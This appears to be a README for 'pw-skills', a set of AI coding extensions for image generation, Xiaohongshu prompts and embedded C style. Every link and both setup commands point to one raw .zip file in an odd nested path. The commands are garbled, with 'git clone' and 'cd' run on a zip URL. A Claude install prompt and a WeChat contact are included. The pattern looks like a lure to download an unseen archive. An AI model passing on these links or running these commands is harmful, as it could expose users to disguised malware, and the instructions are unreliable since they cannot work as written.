Welcome to the pw-skills repository! This project provides useful AI extensions to help you with coding tasks.
- pw-image-generation: AI image generation workflow (text-to-image, image-to-image, batch generation).
- pw-redbook-image: Xiaohongshu style prompt template.
- pw-embedded-c-style: Embedded C code style assistant (project creation, code optimization).
Refer to each https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip for detailed usage instructions.
To get started with pw-skills, follow these steps:
-
Visit the Releases Page: Click below to access the release files.
-
Choose Your Version: On the releases page, find the latest version and download the appropriate file for your system.
If you prefer to set up the skills yourself, use the following commands:
# Clone the repository to your computer
git clone https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip ~https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip
# Navigate to the image generation skill and install dependencies
cd ~https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip && npm installYou can also let Claude assist you with the installation and configuration:
Please help me install the pw-image-generation skill:
1. Go to the skill directory and install dependencies
2. Set up the ai-router API Key: [your API key]
3. Create a test project and generate a test image
Get your API Key: ai-router
- The API Key is a key for ai-router, supporting various models.
- You need to log in with GitHub. Ensure your GitHub account displays your email.
- gemini-3-pro-image-preview: Google Gemini 3 Pro image preview model (generation).
- gemini-2.0-flash-exp: Google Gemini 2.0 Flash experimental model (analysis).
- Additional models supporting image generation.
Mou Yong | AI Router | WeChat: 1254074921
Feel free to reach out for any questions or support with the pw-skills project. Happy coding!